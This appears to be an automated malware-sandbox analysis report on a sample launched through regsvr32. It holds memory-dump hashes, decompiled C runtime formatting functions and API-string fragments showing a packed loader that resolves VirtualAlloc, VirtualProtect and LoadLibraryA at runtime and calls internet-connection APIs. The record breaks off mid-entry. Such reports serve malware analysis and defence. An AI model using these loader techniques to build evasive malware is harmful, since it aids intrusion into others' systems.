                                    • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                    • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                    • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                    • API String ID: 4112623284-4095683531
                                    • Opcode ID: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                    • Instruction ID: b519865c658f5b17901cea146d1bd99b4d455d983c8f9f0677e22a9713547b35
                                    • Opcode Fuzzy Hash: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                    • Instruction Fuzzy Hash: 8E911D3661DB8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 19%
                                    			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                    				signed int _t217;
                                    				signed char _t222;
                                    				intOrPtr _t257;
                                    				signed int _t332;
                                    				signed int _t333;
                                    				signed long long _t336;
                                    				intOrPtr* _t359;
                                    				signed long long _t384;
                                    
                                    				_t332 = __rax;
                                    				_a116 = 0x10;
                                    				asm("bts eax, 0xf");
                                    				_a708 = 7;
                                    				_a708 = 0x27;
                                    				_a72 = 0x10;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                    				_a84 = 0x30;
                                    				_a85 = _a708 + 0x51;
                                    				_a92 = 2;
                                    				_a72 = 8;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                    				asm("bts eax, 0x9");
                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                    				E000007FE7FEF9D31EA0( &_a1112);
                                    				_a824 = _t332;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                    				E000007FE7FEF9D31EA0( &_a1112);
                                    				_a824 = _t332;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                    				_t333 = E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t333;
                                    				goto 0xf9d3c80e;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t333;
                                    				goto 0xf9d3c84b;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t333;
                                    				goto 0xf9d3c84b;
                                    				E000007FE7FEF9D31E40( &_a1112);
                                    				_a824 = _t333;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                    				if (_a824 >= 0) goto 0xf9d3c882;
                                    				_a832 =  ~_a824;
                                    				asm("bts eax, 0x8");
                                    				goto 0xf9d3c892;
                                    				_t336 = _a824;
                                    				_a832 = _t336;
                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                    				_a832 = _a832 & _t336;
                                    				if (_a116 >= 0) goto 0xf9d3c8d8;
                                    				_a116 = 1;
                                    				goto 0xf9d3c8f5;
                                    				_a80 = _a80 & 0xfffffff7;
                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                    				_a116 = 0x200;
                                    				if (_a832 != 0) goto 0xf9d3c908;
                                    				_a92 = 0;
                                    				_a64 =  &_a687;
                                    				_t217 = _a116;
                                    				_a116 = _a116 - 1;
                                    				if (_t217 > 0) goto 0xf9d3c936;
                                    				if (_a832 == 0) goto 0xf9d3c9d3;
                                    				_a1040 = _a72;
                                    				_a816 = _t217 / _a1040 + 0x30;
                                    				_a1048 = _a72;
                                    				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                    				_t222 = _a816 + _a708;
                                    				_a816 = _t222;
                                    				 *_a64 = _a816 & 0x000000ff;
                                    				_a64 = _a64 - 1;
                                    				goto 0xf9d3c915;
                                    				_a104 = _t222;
                                    				_a64 = _a64 + 1;
                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                    				if (_a104 == 0) goto 0xf9d3ca12;
                                    				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                    				_a64 = _a64 - 1;
                                    				 *_a64 = 0x30;
                                    				_a104 = _a104 + 1;
                                    				if (_a108 != 0) goto 0xf9d3cc6e;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                    				_a84 = 0x2d;
                                    				_a92 = 1;
                                    				goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                    				_a84 = 0x2b;
                                    				_a92 = 1;
                                    				goto 0xf9d3ca95;
                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                    				_a84 = 0x20;
                                    				_a92 = 1;
                                    				_a840 = _a88 - _a104 - _a92;
                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                    				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                    				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                    				if (_a76 == 0) goto 0xf9d3cc1d;
                                    				if (_a104 <= 0) goto 0xf9d3cc1d;
                                    				_a872 = 0;
                                    				_a848 = _a64;
                                    				_a856 = _a104;
                                    				_a856 = _a856 - 1;
                                    				if (_a856 == 0) goto 0xf9d3cc1b;
                                    				_a1056 =  *_a848 & 0x0000ffff;
                                    				r9d = _a1056 & 0x0000ffff;
                                    				r8d = 6;
                                    				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                    				_a848 =  &(_a848[1]);
                                    				if (_a872 != 0) goto 0xf9d3cbe5;
                                    				if (_a860 != 0) goto 0xf9d3cbf2;
                                    				_a688 = 0xffffffff;
                                    				goto 0xf9d3cc1b;
                                    				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                    				goto 0xf9d3cb60;
                                    				goto 0xf9d3cc3b;
                                    				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                    				if (_a688 < 0) goto 0xf9d3cc6e;
                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                    				if (_a96 == 0) goto 0xf9d3cc8e;
                                    				0xf9d25330();
                                    				_a96 = 0;
                                    				goto 0xf9d3b99c;
                                    				if (_a704 == 0) goto 0xf9d3ccb4;
                                    				if (_a704 == 7) goto 0xf9d3ccb4;
                                    				_a1060 = 0;
                                    				goto 0xf9d3ccbf;
                                    				_a1060 = 1;
                                    				_t257 = _a1060;
                                    				_a876 = _t257;
                                    				if (_a876 != 0) goto 0xf9d3cd05;
                                    				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                    				_a32 = _t359;
                                    				r9d = 0;
                                    				r8d = 0x8f5;
                                    				0xf9d2b3b0();
                                    				if (_t257 != 1) goto 0xf9d3cd05;
                                    				asm("int3");
                                    				if (_a876 != 0) goto 0xf9d3cd61;
                                    				0xf9d2ab30();
                                    				 *_t359 = 0x16;
                                    				_a32 = 0;
                                    				r9d = 0x8f5;
                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    				_a912 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				goto 0xf9d3cd80;
                                    				_a916 = _a688;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    			}












                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: 0$9
                                    • API String ID: 1967237116-1975997740
                                    • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                    • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                    • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                    • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 23%
                                    			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                    				signed int _t213;
                                    				signed char _t218;
                                    				void* _t249;
                                    				intOrPtr _t257;
                                    				signed int _t331;
                                    				signed int _t332;
                                    				signed long long _t335;
                                    				intOrPtr* _t354;
                                    				intOrPtr* _t359;
                                    				signed long long _t389;
                                    
                                    				_t331 = __rax;
                                    				_a1220 = 0x27;
                                    				_a72 = 0x10;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                    				_a84 = 0x30;
                                    				_a86 = _a1220 + 0x51;
                                    				_a92 = 2;
                                    				_a72 = 8;
                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                    				asm("bts eax, 0x9");
                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                    				E000007FE7FEF9D31EA0( &_a1560);
                                    				_a1304 = _t331;
                                    				goto 0xf9d3e844;
                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                    				E000007FE7FEF9D31EA0( &_a1560);
                                    				_a1304 = _t331;
                                    				goto 0xf9d3e844;
                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                    				_t332 = E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t332;
                                    				goto 0xf9d3e807;
                                    				E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t332;
                                    				goto 0xf9d3e844;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                    				E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t332;
                                    				goto 0xf9d3e844;
                                    				E000007FE7FEF9D31E40( &_a1560);
                                    				_a1304 = _t332;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                    				if (_a1304 >= 0) goto 0xf9d3e87b;
                                    				_a1312 =  ~_a1304;
                                    				asm("bts eax, 0x8");
                                    				goto 0xf9d3e88b;
                                    				_t335 = _a1304;
                                    				_a1312 = _t335;
                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                    				_a1312 = _a1312 & _t335;
                                    				if (_a116 >= 0) goto 0xf9d3e8d1;
                                    				_a116 = 1;
                                    				goto 0xf9d3e8ee;
                                    				_a80 = _a80 & 0xfffffff7;
                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                    				_a116 = 0x200;
                                    				if (_a1312 != 0) goto 0xf9d3e901;
                                    				_a92 = 0;
                                    				_a64 =  &_a687;
                                    				_t213 = _a116;
                                    				_a116 = _a116 - 1;
                                    				if (_t213 > 0) goto 0xf9d3e92f;
                                    				if (_a1312 == 0) goto 0xf9d3e9cc;
                                    				_a1480 = _a72;
                                    				_a1296 = _t213 / _a1480 + 0x30;
                                    				_a1488 = _a72;
                                    				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                    				_t218 = _a1296 + _a1220;
                                    				_a1296 = _t218;
                                    				 *_a64 = _a1296 & 0x000000ff;
                                    				_a64 = _a64 - 1;
                                    				goto 0xf9d3e90e;
                                    				_a104 = _t218;
                                    				_a64 = _a64 + 1;
                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                    				if (_a104 == 0) goto 0xf9d3ea0b;
                                    				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                    				_a64 = _a64 - 1;
                                    				 *_a64 = 0x30;
                                    				_a104 = _a104 + 1;
                                    				if (_a108 != 0) goto 0xf9d3ec7c;
                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                    				_a84 = 0x2d;
                                    				_a92 = 1;
                                    				goto 0xf9d3ea9d;
                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                    				_a84 = 0x2b;
                                    				_a92 = 1;
                                    				goto 0xf9d3ea9d;
                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                    				_a84 = 0x20;
                                    				_a92 = 1;
                                    				_a1320 = _a88 - _a104 - _a92;
                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                    				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                    				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                    				if (_a76 != 0) goto 0xf9d3ec29;
                                    				if (_a104 <= 0) goto 0xf9d3ec29;
                                    				_t354 = _a64;
                                    				_a1328 = _t354;
                                    				_a1336 = _a104;
                                    				_a1336 = _a1336 - 1;
                                    				if (_a1336 <= 0) goto 0xf9d3ec27;
                                    				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                    				_a1496 = _t354;
                                    				E000007FE7FEF9D26840(_t249,  &_a120);
                                    				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                    				if (_a1340 > 0) goto 0xf9d3ebe7;
                                    				_a1200 = 0xffffffff;
                                    				goto 0xf9d3ec27;
                                    				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                    				_a1328 = _a1328 + _a1340;
                                    				goto 0xf9d3eb61;
                                    				goto 0xf9d3ec47;
                                    				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                    				if (_a1200 < 0) goto 0xf9d3ec7c;
                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                    				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                    				if (_a96 == 0) goto 0xf9d3ec9c;
                                    				0xf9d25330();
                                    				_a96 = 0;
                                    				goto 0xf9d3da75;
                                    				if (_a1216 == 0) goto 0xf9d3ecc2;
                                    				if (_a1216 == 7) goto 0xf9d3ecc2;
                                    				_a1504 = 0;
                                    				goto 0xf9d3eccd;
                                    				_a1504 = 1;
                                    				_t257 = _a1504;
                                    				_a1344 = _t257;
                                    				if (_a1344 != 0) goto 0xf9d3ed13;
                                    				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                    				_a32 = _t359;
                                    				r9d = 0;
                                    				r8d = 0x8f5;
                                    				0xf9d2b3b0();
                                    				if (_t257 != 1) goto 0xf9d3ed13;
                                    				asm("int3");
                                    				if (_a1344 != 0) goto 0xf9d3ed6f;
                                    				0xf9d2ab30();
                                    				 *_t359 = 0x16;
                                    				_a32 = 0;
                                    				r9d = 0x8f5;
                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    				_a1376 = 0xffffffff;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				goto 0xf9d3ed8e;
                                    				_a1380 = _a1200;
                                    				E000007FE7FEF9D26800( &_a120);
                                    				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                    			}














                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: '$9
                                    • API String ID: 1967237116-1823400153
                                    • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                    • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                    • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                    • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock
                                    • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                    • API String ID: 2480363372-1749241151
                                    • Opcode ID: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                    • Instruction ID: 19170a7b4d801314c698f141b2cab39615b7a96e1dab02ace679e734dc17c016
                                    • Opcode Fuzzy Hash: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                    • Instruction Fuzzy Hash: BD113D7AA2868686EBE49B94D841B6D63E1F781795F605036E68E43BA4CB3DE404CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DestroyedExceptionFindFrameObjectUnlink
                                    • String ID: csm
                                    • API String ID: 1826589669-1018135373
                                    • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                    • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                    • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                    • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free_nolock
                                    • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                    • API String ID: 2882679554-3458198949
                                    • Opcode ID: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                    • Instruction ID: ad827b7ac8ab2a7eb82804d35ce3812f3a61bc9df3b9012bdfb51b84df9589d9
                                    • Opcode Fuzzy Hash: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                    • Instruction Fuzzy Hash: D6014431A1C78286EBD09B6AE88472EB3D0F390350F604535E6CD43FA8DBBED4058B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:17.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:4.4%
                                    Total number of Nodes:90
                                    Total number of Limit Nodes:12

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1214636065.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_3b0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                    • API String ID: 2313188843-2517549848
                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction ID: 9afc1e300d741774a680026ef55b814baa8c9bc1b53663ca5f48fe88e5bb128d
                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction Fuzzy Hash: 6A72C430618B488BDB2DDF18C8856FAB7E1FB98305F10462EE9CAD7611DB34D946CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &$5RX$WE0$\h]
                                    • API String ID: 0-3485045178
                                    • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                    • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 47T]$K_j$is[
                                    • API String ID: 0-2699472077
                                    • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                    • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $g$>6$nB
                                    • API String ID: 0-1868063892
                                    • Opcode ID: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                    • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                    • Opcode Fuzzy Hash: 8b852edfb9a28c8a6125e1cd608d8a75501181fe9d205967e4ddb9cdded4da80
                                    • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConnectInternet
                                    • String ID: /w?$pYi
